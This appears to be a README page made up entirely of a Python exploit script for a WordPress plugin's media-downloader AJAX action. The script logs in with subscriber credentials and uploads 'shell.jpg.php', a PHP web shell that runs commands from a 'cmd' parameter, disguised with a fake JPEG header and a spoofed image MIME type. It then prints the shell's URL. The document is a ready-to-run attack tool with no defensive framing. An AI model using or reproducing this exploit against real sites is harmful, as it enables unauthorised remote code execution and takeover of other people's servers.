README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import argparse
def wp_login(site_url, username, password):
"""Authenticate to WordPress and return session cookies"""
login_url = f"{site_url}/wp-login.php"
session = requests.Session()
# Get nonce (if needed)
resp = session.get(login_url)
# Submit login
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In"
}
session.post(login_url, data=login_data)
return session
def exploit(session, target_url):
"""Upload a disguised PHP webshell"""
upload_url = f"{target_url}/wp-admin/admin-ajax.php?action=aeropage_media_downloader"
# Craft malicious .php file with fake image headers
malicious_php = (
b"\xFF\xD8\xFF\xE0" # Fake JPEG header
b"<?php system($_GET['cmd']); ?>"
)
# Spoof MIME as image/jpeg
files = {
"file": ("shell.jpg.php", malicious_php, "image/jpeg")
}
# Send upload request
print(f"[*] Uploading malicious file to {upload_url}")
r = session.post(upload_url, files=files)
if r.status_code == 200 and "success" in r.text.lower():
print("[+] Exploit succeeded! Webshell uploaded.")
# Extract upload path from response (adjust regex as needed)
import re
match = re.search(r"File saved at: (.+?\.php)", r.text)
if match:
print(f"[+] Webshell URL: {match.group(1)}?cmd=id")
else:
print(f"[-] Upload failed (HTTP {r.status_code})")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
parser.add_argument("-l", "--login", required=True, help="Subscriber username")
parser.add_argument("-p", "--password", required=True, help="Subscriber password")
args = parser.parse_args()
# Step 1: Authenticate
print(f"[*] Logging in as {args.login}...")
session = wp_login(args.url, args.login, args.password)
# Step 2: Exploit
exploit(session, args.url)